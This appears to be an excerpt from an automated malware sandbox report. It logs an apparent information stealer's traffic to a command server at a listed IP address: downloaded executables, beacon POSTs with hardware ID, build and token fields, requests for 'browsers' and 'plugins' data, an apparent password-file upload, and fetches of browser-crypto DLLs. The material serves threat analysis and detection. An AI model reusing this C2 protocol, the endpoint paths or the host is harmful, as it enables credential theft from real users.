Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 32 41 34 31 34 30 31 38 36 46 31 33 35 30 38 32 37 30 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 72 65 6e 6f 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 2d 2d 0d 0a Data Ascii: ------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="hwid"992A4140186F1350827015------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="build"reno------KEBFHIJECFIDGDGCGHCG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 2d 2d 0d 0a Data Ascii: ------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="message"browsers------JDAFBKECAKFCAAAKJDAK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 2d 2d 0d 0a Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="message"plugins------HJJKFBGCFHCGDHIDAAEC--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="message"fplugins------AFCBAEBAEBFHCAKFCAKE--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHHost: 185.215.113.115Content-Length: 6295Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDHHost: 185.215.113.115Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFHDAKECFIDGDGDBKJDHost: 185.215.113.115Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDAFHCBAKFCAAKFCFCHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 2d 2d 0d 0a Data Ascii: ------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="file"------FHIDAFHCBAKFCAAKFCFC--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="file"------GHDAAKJEGCFCAKEBKJJE--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
